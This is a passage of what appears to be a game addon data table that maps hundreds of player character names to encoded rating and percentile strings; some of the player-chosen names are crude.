["Antss"] = "RB:515/71%EM:881/91%",
["Tallest"] = "EB:576/81%EM:729/86%",
["Pirrp"] = "RB:531/67%EM:758/80%",
["Ojbluntworth"] = "RB:337/67%RM:313/57%",
["Morgh"] = "EB:583/77%EM:819/87%",
["Covid"] = "CM:48/3%",
["Targaryeon"] = "RM:494/52%",
["Mayana"] = "UM:385/39%",
["Magelit"] = "CM:127/11%",
["Yourlife"] = "CB:64/5%CM:104/8%",
["Pauley"] = "EB:682/88%LM:984/98%",
["Sttank"] = "EB:564/78%EM:849/90%",
["Hercvex"] = "UM:447/45%",
["Brocket"] = "EM:871/88%",
["Loi"] = "EB:633/86%EM:793/89%",
["Tourniquet"] = "UB:313/41%RM:650/72%",
["Hoodini"] = "CB:149/18%UM:402/41%",
["Fonts"] = "UM:346/36%",
["Solemon"] = "CM:115/10%",
["Dmgovertime"] = "CM:27/0%",
["Zerrax"] = "CM:27/0%",
["Pancakes"] = "UB:315/41%UM:362/38%",
["Finnian"] = "CM:129/11%",
["Reckage"] = "CM:79/7%",
["Epicenen"] = "CB:90/10%UM:348/37%",
["Premorse"] = "CB:86/10%UM:448/49%",
["Tuo"] = "RB:440/58%EM:876/89%",
["Halitus"] = "CM:27/0%",
["Stardeath"] = "UB:369/44%UM:548/49%",
["Vomitbeard"] = "CM:173/16%",
["Banshees"] = "UB:256/32%RM:618/64%",
["Babygrl"] = "CM:118/10%",
["Chopard"] = "EB:622/79%EM:740/78%",
["Skalinto"] = "RM:432/66%",
["Hmm"] = "UM:340/34%",
["Malec"] = "CB:169/18%EM:799/77%",
["Johari"] = "RB:536/74%RM:525/58%",
["Itsmerlin"] = "CM:214/21%",
["Ottway"] = "UM:257/46%",
["Frenzied"] = "CM:56/9%",
["Worrier"] = "RB:456/57%RM:458/73%",
["Treating"] = "EB:657/89%EM:821/86%",
["Nexima"] = "CB:135/16%RM:682/74%",
["Ebov"] = "CB:134/16%RM:703/74%",
["Jazié"] = "CT:25/0%CB:101/10%RM:445/53%",
["Beepone"] = "EM:754/77%",
["Amurdera"] = "UM:419/43%",
["Poonslay"] = "CB:67/7%RM:664/69%",
["Waitbleed"] = "UB:289/32%UM:398/41%",
["Quazy"] = "CB:51/5%RM:685/73%",
["Liltoes"] = "RB:249/54%RM:549/71%",
["Julian"] = "UB:318/39%RM:674/72%",
["Zalhuna"] = "CM:43/6%",
["Mortäl"] = "CM:33/4%",
["Samma"] = "ET:637/79%CB:93/9%RM:493/52%",
["Batchat"] = "CM:60/7%",
["Dianmao"] = "CM:60/7%",
["Doulihuahua"] = "CM:249/23%",
["Tonygg"] = "CM:77/6%",
["Mcdank"] = "RB:579/74%LM:982/98%",
["Ryann"] = "RB:563/73%RM:610/63%",
["Parrp"] = "RB:416/55%EM:816/83%",
["Bemii"] = "UB:356/48%UM:445/48%",
["Diayna"] = "UB:253/31%UM:312/35%",
["Aragar"] = "UB:132/27%RM:367/59%",
["Mimilegend"] = "RB:534/70%EM:930/94%",
["Shofer"] = "EB:577/76%EM:915/93%",
["Fellena"] = "RB:465/66%EM:793/89%",
["Zakenstein"] = "EB:658/85%LM:981/98%",
["Ruggles"] = "RM:312/62%",
["Kurthrus"] = "CM:171/17%",
["Soulbringer"] = "RM:524/57%",
["Gizzler"] = "CM:157/16%",
["Stabpoke"] = "RM:650/61%",
["Lorecraft"] = "RB:509/70%UM:369/39%",
["Melerine"] = "UM:407/49%",
["Drdoomer"] = "RM:558/61%",
["Hondor"] = "UM:71/35%",
["Moonfoy"] = "CM:44/3%",
["Alystine"] = "CB:34/2%",
["Zeldahyrule"] = "CB:146/15%UM:428/44%",
["Skc"] = "UB:365/49%CM:88/6%",
["Swooshi"] = "CB:59/6%UM:263/36%",
["Starlotus"] = "UB:374/48%RM:599/62%",
["Flesholight"] = "CB:52/3%CM:28/0%",
["Murse"] = "RB:407/54%UM:438/47%",
["Morrdotz"] = "UM:477/49%",
["Orlylol"] = "UB:225/28%UM:306/31%",
["Felcohol"] = "CM:68/6%",
["Rushin"] = "RM:523/55%",
["Kovakz"] = "CM:188/20%",
["Magicfro"] = "CB:107/12%CM:173/18%",
["Jabstep"] = "CM:175/17%",
["Cuccboi"] = "RM:629/69%",
["Dotspewlaser"] = "CB:145/18%UM:454/46%",
["Datguy"] = "RB:486/64%EM:875/89%",
["Bumie"] = "EB:580/80%EM:622/86%",
["Uwumizu"] = "UM:258/26%",
["Poveglia"] = "UB:383/48%RM:616/66%",
["Wocaway"] = "UB:351/47%UM:253/34%",
["Tbanana"] = "RB:511/67%RM:516/54%",
["Sewerbully"] = "RB:384/52%RM:478/70%",
["Unlasting"] = "RB:459/63%RM:650/72%",
["Blixxus"] = "CM:58/5%",
["Richa"] = "UB:372/44%RM:755/71%",
["Hyoju"] = "CB:197/23%UM:433/46%",
["Mayniak"] = "RB:431/59%EM:815/85%",
["Underpants"] = "EM:601/78%",
["Vev"] = "CM:71/6%",
["Toostoned"] = "CM:151/13%",
["Hordess"] = "UB:235/30%RM:640/70%",
["Yuckers"] = "UM:433/44%",
["Quinzy"] = "CM:77/6%",
["Dogde"] = "CB:153/18%CM:229/23%",
["Thunderheart"] = "RB:396/72%EM:635/79%",
["Gannakin"] = "CB:161/20%RM:571/63%",
["Xaniel"] = "CM:66/6%",
["Kosmic"] = "CM:142/16%",
["Bellith"] = "UB:315/41%RM:460/50%",
["Barbdon"] = "EM:617/86%",
["Marrane"] = "CM:86/10%",
["Shalahn"] = "CM:25/0%",
["Theadore"] = "RB:534/70%EM:806/84%",
["Namiko"] = "RB:451/60%EM:836/88%",
["Guldaan"] = "CB:26/0%UM:269/27%",
["Mayuki"] = "EB:691/93%EM:860/91%",
["Bashan"] = "CM:117/13%",
["Titfckit"] = "CM:32/4%",
["Faie"] = "UB:214/25%EM:738/78%",
["Prioress"] = "CM:99/8%",
["Hassah"] = "CB:133/16%UM:479/47%",
["Dfish"] = "CM:73/7%",
["Porkloin"] = "RM:75/53%",
["Zahti"] = "UB:225/28%RM:566/62%",
["Pequis"] = "UM:245/25%",
["Holysheet"] = "EB:586/81%LM:911/95%",
["Equivalent"] = "EB:698/89%EM:932/94%",
["Fashii"] = "CB:111/13%UM:349/37%",
["Clashalden"] = "UB:360/42%RM:671/72%",
["Decomposeman"] = "CM:192/19%",
["Tessie"] = "CB:41/3%CM:188/17%",
["Demonicko"] = "CB:77/15%RM:403/62%",
["Ugabuga"] = "UB:360/47%RM:677/74%",
["Izaro"] = "RM:333/55%",
["Xiaopangpang"] = "RB:417/54%EM:758/79%",
["Grassmudma"] = "UB:374/47%EM:778/75%",
["Bromine"] = "RB:469/60%EM:785/76%",
["Nanashi"] = "UB:288/35%RM:601/64%",
["Chenyue"] = "CB:188/23%RM:632/69%",
["Frumie"] = "CM:42/3%",
["Vybes"] = "EM:695/76%",
["Nugs"] = "RM:210/53%",
["Durfang"] = "CM:187/19%",
["Frostfallen"] = "EM:848/88%",
["Gang"] = "CM:112/9%",
["Gapteeth"] = "RB:295/67%UM:298/49%",
["Mioa"] = "UB:383/46%RM:613/66%",
["Sensos"] = "CM:147/13%",
["Reddodo"] = "CM:90/7%",
["Hauz"] = "RB:481/64%EM:846/89%",
["Carlsbad"] = "RB:410/63%EM:554/75%",
["Mathesi"] = "UB:296/37%UM:476/48%",
["Manapuaman"] = "UM:329/32%",
["Kurtrussel"] = "CM:110/15%",
["Byrgenwerth"] = "RM:672/73%",
["Hatricia"] = "RM:289/57%",
["Budduhca"] = "RB:515/65%RM:676/72%",
["Blowkain"] = "UB:356/46%RM:659/72%",
["Rexxair"] = "CB:149/18%RM:589/63%",
["Spiritbombz"] = "CM:221/21%",
["Rágnàr"] = "RB:428/65%EM:667/82%",
["Orthorexic"] = "UM:263/35%",
["Zumb"] = "EB:642/84%EM:895/93%",
["Kimbro"] = "RB:415/55%EM:768/82%",
["Goblingutter"] = "UB:346/40%RM:526/56%",
["Wreckmedaddy"] = "CB:30/2%CM:207/21%",
["Zepol"] = "UM:426/45%",
["Fooderator"] = "RB:400/53%EM:728/79%",
["Mitti"] = "CM:55/4%",
["Rysen"] = "UB:365/48%RM:635/70%",
["Horsè"] = "RB:535/74%EM:797/86%",
["Yannica"] = "UB:295/38%CM:51/3%",
["Yoppas"] = "UM:292/30%",
["Slicc"] = "EB:627/80%LM:970/97%",
["Akiza"] = "CB:195/24%RM:637/70%",
["Wired"] = "EB:563/78%LM:944/97%",
["Lilsneaker"] = "EB:587/75%EM:898/89%",
["Kirsie"] = "RB:437/58%EM:697/76%",
["Karnus"] = "EB:715/90%LM:942/95%",
["Sefi"] = "UB:294/38%UM:446/48%",
["Jasai"] = "RB:500/64%RM:684/65%",
["Gdmorning"] = "CM:167/17%",
["Tenyou"] = "RM:202/69%",
["Dojukss"] = "CM:205/20%",
["Mackjr"] = "CM:36/2%",
["Battlerez"] = "RB:188/57%LM:904/95%",
["Hkày"] = "EB:684/91%SM:980/99%",
["Mayven"] = "EB:596/82%EM:744/78%",
["Darkstormz"] = "UM:487/49%",
["Stefano"] = "CM:126/17%",
["Titanmöde"] = "UM:290/29%",
["Squanto"] = "RM:495/55%",
["Serekii"] = "RM:245/55%",
["Madvis"] = "UM:418/45%",
["Fingerblastr"] = "CM:74/6%",
["Rnzl"] = "LM:984/98%",
["Blasttastic"] = "CM:166/16%",
["Image"] = "CB:128/14%RM:516/57%",
["Nanna"] = "RB:381/50%RM:650/71%",
["Ramifex"] = "CM:66/6%",
["Osteohex"] = "RT:174/59%UB:332/42%UM:416/42%",
["Waz"] = "RB:518/69%EM:771/83%",
["Cvoa"] = "CM:81/8%",
["Jyuan"] = "UM:314/33%",
["Shawnrees"] = "CB:54/5%RM:489/51%",
["Dalinbe"] = "CB:42/3%UM:206/25%",
["Ichimaru"] = "CB:26/0%CM:184/18%",
["Needthat"] = "RM:559/59%",
["Fresia"] = "RM:500/55%",
["Valroy"] = "RB:462/64%RM:608/67%",
["Kragnor"] = "CB:60/5%RM:521/57%",
["Bigdisclover"] = "UB:224/28%RM:566/62%",
["Handyandy"] = "RB:545/70%RM:688/73%",
["Hamasaurus"] = "RB:572/73%EM:907/90%",
["Roddyrich"] = "RB:468/64%EM:877/92%",
["Trashman"] = "CB:29/1%RM:595/65%",
["Priscillah"] = "CB:175/22%CM:233/23%",
["Kelreth"] = "RM:205/53%",
["Diabetez"] = "RM:312/66%",
["Lurkín"] = "CM:58/5%",
["Superdix"] = "CB:103/11%RM:559/62%",
["Repanzer"] = "RM:390/62%",
["Boorapennu"] = "RM:536/61%",
["Meatbread"] = "CM:211/21%",
["Nipzon"] = "UM:291/29%",
["Arbella"] = "CM:138/12%",
["Verato"] = "RB:190/54%RM:244/57%",
["Thekitty"] = "RB:228/60%RM:404/65%",
["Faralex"] = "CB:112/14%UM:339/34%",
["Goldenweek"] = "RM:545/60%",
["Kieff"] = "CB:164/19%UM:407/44%",
["Snackbae"] = "RB:380/50%RM:722/74%",
["Loanwolf"] = "UB:248/43%RM:532/56%",
["Kelgrimm"] = "RB:487/72%EM:590/82%",
["Youwish"] = "RM:497/54%",
["Quineloe"] = "UB:290/38%RM:415/50%",
["Arizemychamp"] = "UB:290/38%RM:512/56%",
["Wickedsmaht"] = "CB:59/6%CM:73/7%",
["Drougen"] = "EB:610/79%EM:863/89%",
["Mambaba"] = "CB:66/7%UM:386/39%",
["Shalight"] = "CM:68/6%",
["Wizdòg"] = "RB:436/54%EM:901/90%",
["Subzeroh"] = "RB:514/68%LM:926/95%",
["Böömchicken"] = "EB:428/76%EM:613/81%",
["Sadent"] = "RB:433/57%RM:763/74%",
["Moltenmoma"] = "RB:507/67%EM:734/79%",
["Cooliet"] = "CM:179/17%",
["Jpmöney"] = "UB:350/46%EM:810/84%",
["Metoprolol"] = "UB:210/26%UM:202/26%",
["Iheal"] = "RB:413/56%RM:664/72%",
["Kleen"] = "EB:715/90%LM:964/96%",
["Sargonnas"] = "ST:662/99%LB:724/96%EM:880/92%",
["Gulrin"] = "EB:630/80%LM:968/97%",
["Alakazam"] = "EB:593/82%LM:945/97%",
["Matahari"] = "LB:760/95%SM:993/99%",
["Antonelli"] = "EB:692/87%LM:972/97%",
["Ayoriver"] = "EB:668/84%EM:904/90%",
["Synister"] = "UB:223/28%EM:723/78%",
["Whippet"] = "UB:357/45%RM:570/59%",
["Bilbobaggin"] = "RB:555/74%EM:717/78%",
["Fuegodedios"] = "RB:361/72%EM:681/87%",
["Zozzer"] = "RB:520/67%EM:852/84%",
["Sarlek"] = "UB:262/28%RM:546/58%",
["Millinerd"] = "EB:620/84%UM:406/43%",
["Fba"] = "CM:110/9%",
["Nococo"] = "RB:401/54%UM:330/34%",
["Chadkerk"] = "UM:408/41%",
["Apparent"] = "RM:646/63%",
["Naleak"] = "RB:475/60%EM:807/78%",
["Palapas"] = "CB:31/2%RM:595/65%",
["Ostricho"] = "CM:68/6%",
["Pullnpray"] = "CB:168/19%UM:429/46%",
["Aveda"] = "UB:212/25%RM:501/53%",
["Ichimoku"] = "RB:455/60%EM:787/82%",
["Notmerlin"] = "UB:336/45%RM:505/55%",
["Byte"] = "EM:868/92%",
["Illyslav"] = "RM:561/61%",
["Apus"] = "RB:504/67%EM:863/90%",
["Charizard"] = "CM:54/3%",
["Luny"] = "UB:320/42%RM:637/70%",
["Zaltec"] = "CB:121/13%UM:453/49%",
["Dudumchit"] = "EB:584/81%RM:653/72%",
["Crimzon"] = "RB:435/57%EM:838/85%",
["Punishedxk"] = "RB:571/73%EM:839/87%",
["Tangomango"] = "RB:439/60%EM:731/76%",
["Fatesealer"] = "CB:100/12%UM:367/38%",
["Suvious"] = "CM:190/19%",
["Badrogue"] = "CB:39/4%UM:250/30%",
["Boguslav"] = "CM:27/0%",
["Veldryn"] = "CM:135/12%",
["Finalshine"] = "RB:470/59%EM:662/82%",
["Landey"] = "LT:821/97%SB:773/99%LM:927/96%",
["Zarland"] = "LB:739/96%EM:867/90%",
["Shaniran"] = "UB:315/42%RM:613/68%",
["Lendy"] = "UB:326/42%EM:815/83%",
["Bradus"] = "CB:100/12%UM:272/32%",
["Poostank"] = "RM:388/63%",
["Resden"] = "CM:239/23%",
["Walkindead"] = "CM:196/19%",
["Weshed"] = "LB:769/96%SM:1011/99%",
["Neheb"] = "CM:114/14%",
["Deathal"] = "CM:54/3%",
["Eddynugz"] = "RB:420/55%EM:786/84%",
["Necromansir"] = "CM:136/14%",
["Anitata"] = "RB:469/64%RM:592/66%",
["Pewpewhottie"] = "RB:216/52%RM:477/50%",
["Chopcity"] = "CB:52/5%CM:133/15%",
["Shankubro"] = "UM:381/40%",
["Lesh"] = "CM:53/3%",
["Ayanea"] = "CB:36/2%UM:391/42%",
["Seeyounte"] = "EM:663/83%",
["Razkal"] = "UM:382/41%",
["Riggormortis"] = "EM:857/86%",
["Strawberrÿ"] = "EB:595/83%LM:928/96%",
["Dalamaarr"] = "RM:604/64%",
["Swim"] = "CM:31/2%",
["Cauldor"] = "CM:113/15%",
["Dej"] = "UB:289/37%RM:600/64%",
["Twoninea"] = "UB:137/34%RM:689/65%",
["Frostpyro"] = "UM:344/36%",
["Negivas"] = "CM:144/13%",
["Saladfork"] = "CB:35/2%RM:437/52%",
["Robbstark"] = "EB:592/78%EM:778/79%",
["Oox"] = "EM:904/93%",
["Cutie"] = "CM:243/24%",
["Shrine"] = "RB:427/58%EM:903/94%",
["Stone"] = "RB:441/67%EM:643/84%",
["Zugsnhugs"] = "CM:186/19%",
["Auxilios"] = "CB:62/7%UM:347/36%",
["Melísandre"] = "CM:218/21%",
["Malidus"] = "UB:361/42%EM:795/76%",
["Teruana"] = "CM:65/5%",
["Happygirl"] = "CM:59/4%",
["Magnataur"] = "CB:46/5%CM:117/15%",
["Redneckhippy"] = "CB:151/16%UM:342/36%",
["Bootydoc"] = "RB:399/68%EM:691/83%",
["Cleancut"] = "RM:497/53%",
["Krazyhealz"] = "CB:129/14%LM:916/95%",
["Cvsreceipt"] = "CM:140/13%",
["Matildastork"] = "EB:692/87%EM:872/89%",
["Heartcrusher"] = "CB:186/22%UM:279/28%",
["Stabbincabin"] = "RB:405/51%UM:415/43%",
["Ooxoox"] = "UM:449/49%",
["Roknok"] = "EB:580/82%EM:747/87%",
["Euryale"] = "CM:37/2%",
["Arissaranara"] = "LB:749/97%LM:930/96%",
["Nacl"] = "EB:576/75%EM:906/93%",
["Zastin"] = "UM:488/45%",
["Katnis"] = "EB:602/78%LM:939/95%",
["Fever"] = "UB:350/44%RM:604/62%",
["Xaka"] = "CM:199/18%",
["Dibles"] = "UB:273/35%EM:748/80%",
["Wasteland"] = "EB:699/92%SM:984/99%",
["Dogemad"] = "CB:26/0%UM:343/36%",
["Skatergoon"] = "UB:288/32%RM:534/57%",
["Dyzê"] = "UB:327/42%EM:769/83%",
["Floresiensis"] = "CB:80/7%UM:443/47%",
["Magewindu"] = "UB:258/33%RM:557/61%",
["Krasavice"] = "CB:178/22%RM:702/74%",
["Hypomania"] = "RB:209/51%LM:916/96%",
["Quiteshort"] = "CB:148/17%CM:176/16%",
["Ihascandy"] = "CB:183/19%UM:444/46%",
["Getnrekt"] = "RB:487/61%RM:547/58%",
["Slowshooter"] = "CB:28/1%EM:813/84%",
["Ignyte"] = "CB:97/11%CM:102/9%",
["Guccicucci"] = "CM:149/16%",
["Blockblock"] = "RM:563/62%",
["Suteku"] = "CM:34/2%",
["Zebgame"] = "CB:206/22%RM:590/63%",
["Naughtycow"] = "RB:448/61%EM:831/87%",
["Hotfob"] = "UB:325/41%RM:700/74%",
["Guha"] = "CM:74/5%",
["Gardettos"] = "CB:131/14%UM:446/48%",
["Jangos"] = "CB:188/23%RM:589/57%",
["Guinny"] = "RM:403/70%",
["Dawang"] = "CB:39/2%UM:269/36%",
["Mokotize"] = "CM:16/18%",
["Syd"] = "EB:591/77%LM:948/95%",
["Cowmando"] = "RB:476/66%EM:841/89%",
["Winterz"] = "CM:199/19%",
["Sohungry"] = "CB:50/5%RM:539/59%",
["Ballsmack"] = "EB:548/76%EM:693/76%",
["Jubanita"] = "CB:196/24%RM:668/69%",
["Cripz"] = "UB:295/36%EM:809/79%",
["Bigmoist"] = "EM:826/88%",
["Adderallol"] = "UM:377/40%",
["Notarichmon"] = "RM:541/57%",
["Manly"] = "RM:580/65%",
["Basura"] = "UM:289/28%",
["Cioccolata"] = "CB:161/20%EM:691/75%",
["Spicyhawt"] = "UB:108/45%EM:655/85%",
["Koreaboy"] = "CB:55/5%RM:505/55%",
["Whodeok"] = "RB:429/59%EM:802/85%",
["Elwynd"] = "CB:31/2%EM:832/83%",
["Drewid"] = "EM:812/85%",
["Stelloxlg"] = "UM:391/40%",
["Rkid"] = "UM:435/44%",
["Ivanll"] = "UB:280/35%RM:617/66%",
["Bachii"] = "RB:373/50%RM:508/68%",
["Rubywolf"] = "RM:553/57%",
["Panthero"] = "CM:116/13%",
["Viadimir"] = "EB:616/81%EM:828/88%",
["Jayshorty"] = "CB:117/14%EM:738/75%",
["Ehraphilea"] = "UM:272/27%",
["Sixtwontindr"] = "RB:476/60%EM:901/90%",
["Nerfd"] = "EM:598/78%",
["Poohjinpig"] = "EM:525/80%",
["Jebelscum"] = "UM:231/25%",
["Hoontarr"] = "CM:61/8%",
["Liyo"] = "CM:113/10%",
["Monmon"] = "RM:260/56%",
["Fluxcore"] = "UM:241/44%",
["Firewarrior"] = "CM:83/7%",
["Emeralde"] = "CM:162/17%",
["Gerhugoboss"] = "CM:136/12%",
["Efronia"] = "EB:566/79%RM:604/67%",
["Itakehits"] = "CM:39/5%",
["Pilume"] = "UB:200/25%RM:670/73%",
["Chargelot"] = "CM:74/9%",
["Insanitee"] = "RB:487/67%EM:705/78%",
["Khansmash"] = "UM:388/41%",
["Thottndot"] = "CB:65/7%UM:289/33%",
["Farmersx"] = "RB:509/65%EM:896/91%",
["Natashaa"] = "CM:165/15%",
["Aq"] = "RB:428/56%EM:819/83%",
["Damnage"] = "CB:193/24%RM:483/53%",
["Ginbaird"] = "CB:85/10%UM:417/43%",
["Tyelenol"] = "RB:393/53%EM:797/86%",
["Akh"] = "CM:134/12%",
["Tus"] = "UB:221/27%RM:554/61%",
["Prettyminty"] = "UB:357/48%RM:571/63%",
["Ebomb"] = "UM:455/47%",
["Kaysuhdilla"] = "UM:294/30%",
["Isneak"] = "CM:217/22%",
["Coloring"] = "CM:106/14%",
["Piggyplop"] = "CB:193/24%RM:679/71%",
["Tinyghost"] = "CM:78/7%",
["Silviasx"] = "CM:58/4%",
["Spiritleaf"] = "CB:42/3%RM:597/64%",
["Meaho"] = "CB:97/10%",
["Saintkuj"] = "UB:348/46%UM:444/48%",
["Benjason"] = "CM:99/8%",
["Portabello"] = "CB:197/23%UM:415/43%",
["Rollzz"] = "CB:71/8%RM:534/52%",
["Priestzibi"] = "UM:317/33%",
["Demonicevil"] = "RM:586/60%",
["Skulkz"] = "RB:468/60%EM:890/88%",
["Dochael"] = "CB:80/9%RM:521/57%",
["Summonpain"] = "RB:517/68%EM:718/75%",
["Ridellan"] = "CM:134/12%",
["Esjii"] = "RB:509/65%EM:894/89%",
["Griel"] = "UB:268/34%RM:668/73%",
["Pewpies"] = "RB:504/64%LM:949/95%",
["Badbrainz"] = "CB:27/0%UM:256/26%",
["Realmantw"] = "CB:128/14%RM:459/50%",
["Pokechamp"] = "UB:298/36%UM:440/46%",
["Ssakdook"] = "UB:254/30%EM:807/78%",
["Muggsy"] = "RM:290/67%",
["Gigga"] = "RB:485/67%EM:760/79%",
["Zeek"] = "CB:31/1%CM:74/5%",
["Hueg"] = "EM:758/82%",
["Jaena"] = "CM:131/12%",
["Anathemaa"] = "CB:39/2%EM:764/81%",
["Nailinpalin"] = "CM:30/1%",
["Threanne"] = "CB:81/16%EM:665/82%",
["Sølmyr"] = "RM:745/71%",
["Mgs"] = "UM:438/46%",
["Nismorogue"] = "CM:243/24%",
["Zurassilla"] = "UB:76/32%UM:219/42%",
["Zerrix"] = "UM:401/40%",
["Methchemist"] = "CM:206/20%",
["Scream"] = "UB:230/29%RM:635/62%",
["Malinar"] = "CB:55/6%UM:361/36%",
["Nambo"] = "CB:31/2%UM:322/33%",
["Twistedfatee"] = "EM:761/79%",
["Omgitsanoob"] = "CB:27/0%RM:722/74%",
["Jibtech"] = "CT:20/3%UB:295/40%UM:121/40%",
["Slashfang"] = "RB:246/63%EM:646/83%",
["Rajahdat"] = "LB:741/97%LM:960/98%",
["Vysci"] = "EM:835/85%",
["Limons"] = "EM:825/84%",
["Thirdhunt"] = "CB:60/6%RM:760/74%",
["Nekross"] = "EM:892/90%",
["Visara"] = "CB:193/24%UM:349/35%",
["Aviçii"] = "CB:174/21%UM:345/35%",
["Alphamongol"] = "RB:521/66%EM:854/84%",
["Promaetheus"] = "CM:121/14%",
["Pixiestixïe"] = "CB:27/0%RM:493/55%",
["Brenon"] = "UM:292/30%",
["Plana"] = "UB:281/36%RM:684/74%",
["Staticon"] = "UB:286/37%EM:709/77%",
["Aeralin"] = "UM:443/49%",
["Gonz"] = "UT:23/31%CB:108/11%RM:554/61%",
["Glocknine"] = "UM:347/34%",
["Robertus"] = "RB:413/53%RM:711/69%",
["Branchla"] = "RM:508/56%",
["Trickslip"] = "UM:254/25%",
["Dumpsterfyre"] = "UB:334/38%UM:429/44%",
["Necrohealiak"] = "CM:85/6%",
["Tonydin"] = "UM:292/30%",
["Beatrixx"] = "CB:85/10%UM:359/38%",
["Pakadin"] = "RB:326/67%EM:748/81%",
["Doctess"] = "UM:277/28%",
["Cumzamboni"] = "CM:138/12%",
["Oncubus"] = "UB:305/38%RM:676/72%",
["Brewtality"] = "EB:673/87%EM:856/90%",
["Vanillastar"] = "RM:748/73%",
["Polyrhythmic"] = "RB:521/69%EM:837/88%",
["Krix"] = "EB:589/75%EM:780/81%",
["Dizzank"] = "RB:503/64%RM:605/65%",
["Hubris"] = "EB:647/83%EM:867/89%",
["Winster"] = "UM:401/43%",
["Guerillatoss"] = "RB:400/54%RM:559/61%",
["Gillaen"] = "EB:634/89%LM:915/96%",
["Keianna"] = "RB:492/68%RM:663/72%",
["Guzman"] = "RB:237/54%EM:788/75%",
["Cherished"] = "RB:290/67%RM:453/72%",
["Alakazoo"] = "UB:347/45%EM:841/89%",
["Abolish"] = "EB:556/82%EM:810/90%",
["Inxuza"] = "EB:618/85%EM:811/88%",
["Deltashot"] = "EB:680/88%EM:818/87%",
["Artorious"] = "EB:666/84%EM:838/87%",
["Pëlor"] = "RB:535/74%EM:745/79%",
["Tharizdun"] = "EB:596/77%EM:760/79%",
["Lndegenerate"] = "EB:580/77%LM:999/98%",
["Fxlol"] = "RB:396/68%EM:878/92%",
["Pingding"] = "EB:628/80%LM:979/97%",
["Pancakeslol"] = "RB:463/64%RM:679/74%",
["Nahion"] = "UB:331/42%UM:288/28%",
["Mikeaveli"] = "UB:268/32%RM:583/62%",
["Datrogue"] = "RB:450/57%EM:895/89%",
["Uglug"] = "UB:369/44%EM:793/76%",
["Jüglass"] = "EM:804/83%",
["Resuscitated"] = "CM:1/1%",
["Chadshekels"] = "CT:9/0%RM:360/55%",
["Stahr"] = "EB:601/83%EM:770/84%",
["Wargasmic"] = "EB:736/93%EM:919/93%",
["Raystlyn"] = "CB:62/6%UM:412/44%",
["Boax"] = "RB:449/61%EM:722/76%",
["Oneshotman"] = "EB:738/93%EM:843/87%",
["Peters"] = "RB:536/74%EM:757/81%",
["Zephyrn"] = "CB:48/5%UM:438/45%",
["Mythset"] = "UB:277/36%RM:506/56%",
["Bolts"] = "EB:681/93%LM:954/98%",
["Velvetwalrus"] = "EB:557/77%EM:741/78%",
["Bigbrainmage"] = "CB:77/9%UM:409/44%",
["Squaw"] = "CM:155/14%",
["Snikle"] = "CM:191/19%",
["Lunchables"] = "UM:305/31%",
["Antha"] = "UB:321/42%EM:840/89%",
["Raígeki"] = "CM:67/5%",
["Niellex"] = "RB:506/74%EM:672/83%",
["Trashcandy"] = "CB:103/12%RM:504/52%",
["Smurph"] = "RB:462/61%EM:716/76%",
["Spudnubs"] = "UB:250/31%RM:672/74%",
["Bippo"] = "UB:333/43%RM:517/57%",
["Ficciones"] = "RM:192/54%",
["Huncho"] = "RB:477/61%LM:947/96%",
["Shaggorath"] = "CM:102/9%",
["Exaltes"] = "CB:40/4%RM:685/66%",
["Amixi"] = "CM:62/4%",
["Yuufa"] = "RM:673/74%",
["Aeiiwu"] = "EB:643/87%EM:855/89%",
["Stormfist"] = "UM:121/30%",
["Silvercrow"] = "CB:175/22%UM:470/48%",
["Aetarin"] = "RB:433/56%RM:582/57%",
["Ludacritz"] = "LB:781/98%SM:993/99%",
["Corpsedaddya"] = "RB:392/53%EM:804/87%",
["Backwood"] = "EB:621/85%LM:947/97%",
["Seraphicmend"] = "CB:26/0%CM:141/12%",
["Galazbru"] = "UM:540/49%",
["Takenotes"] = "RB:396/68%RM:547/74%",
["Impõse"] = "UM:304/31%",
["Blaar"] = "UB:242/30%EM:774/84%",
["Antartic"] = "UB:368/48%EM:833/88%",
["Vampsin"] = "UB:211/25%RM:698/74%",
["Berner"] = "CM:56/5%",
["Brang"] = "RM:664/64%",
["Freaho"] = "CM:63/5%",
["Flyingarmbar"] = "CM:154/16%",
["Lulo"] = "RB:339/68%RM:475/65%",
["Heraclitus"] = "UB:333/43%RM:596/66%",
["Rentless"] = "CM:142/13%",
["Rickflair"] = "UM:352/37%",
["Cloakingmass"] = "CM:208/20%",
["Inervateme"] = "EB:549/76%EM:724/79%",
["Schrutefarms"] = "UB:376/49%RM:645/71%",
["Deviouss"] = "UB:324/43%RM:654/72%",
["Windward"] = "RM:507/53%",
["Tailss"] = "RB:407/53%EM:707/77%",
["Prelate"] = "UM:437/47%",
["Max"] = "EB:639/86%EM:905/94%",
["Icexslinger"] = "UB:300/38%EM:799/85%",
["Holycheez"] = "EM:217/79%",
["Taurex"] = "CB:101/10%RM:541/59%",
["Thechaz"] = "CB:132/16%RM:616/68%",
["Dannethklim"] = "RM:620/56%",
["Mightx"] = "UB:299/33%RM:690/73%",
["Gloxinia"] = "UB:208/26%UM:432/47%",
["Madevil"] = "CB:20/11%RM:260/66%",
["Sophiazahari"] = "RM:538/55%",
["Sandletics"] = "CB:186/23%UM:351/37%",
["Jahcks"] = "RM:514/69%",
["Zoomamma"] = "UM:397/47%",
["Floriken"] = "CM:170/16%",
["Hazmat"] = "RB:555/72%SM:1010/99%",
["Drunkee"] = "CM:26/0%",
["Nightcuz"] = "CB:70/8%",
["Artillary"] = "RB:391/50%",
["Wolfain"] = "CM:78/7%",
["Shortcast"] = "EB:609/80%EM:864/90%",
["Hrup"] = "EB:606/84%EM:776/89%",
["Velvetoreo"] = "CM:244/24%",
["Goldforheals"] = "RM:419/50%",
["Nimric"] = "CB:94/11%RM:567/58%",
["Tokidoki"] = "CM:226/22%",
["Younzie"] = "UB:317/41%RM:452/52%",
["Mooasaurus"] = "RB:371/50%EM:713/75%",
["Seismic"] = "CM:85/6%",
["Herecura"] = "CM:124/14%",
["Murkie"] = "UM:264/25%",
["Chonto"] = "UB:359/49%RM:586/65%",
["Zarqo"] = "UM:364/38%",
["Midgetmeeche"] = "EB:663/85%EM:808/80%",
["Daggerinknee"] = "UM:314/32%",
["Gisheave"] = "CM:32/1%",
["Dopeman"] = "UM:445/47%",
["Guccislidez"] = "CM:54/3%",
["Sageoff"] = "CB:32/2%RM:564/55%",
["Realthing"] = "EB:602/77%EM:909/93%",
["Minnesoda"] = "RB:523/66%EM:890/91%",
["Aureole"] = "CB:158/18%UM:402/43%",
["Starhe"] = "UB:289/36%UM:484/49%",
["Unagi"] = "UB:228/28%UM:404/41%",
["Slopss"] = "UB:350/47%RM:602/67%",
["Valjita"] = "CM:68/5%",
["Bluelabel"] = "UM:283/37%",
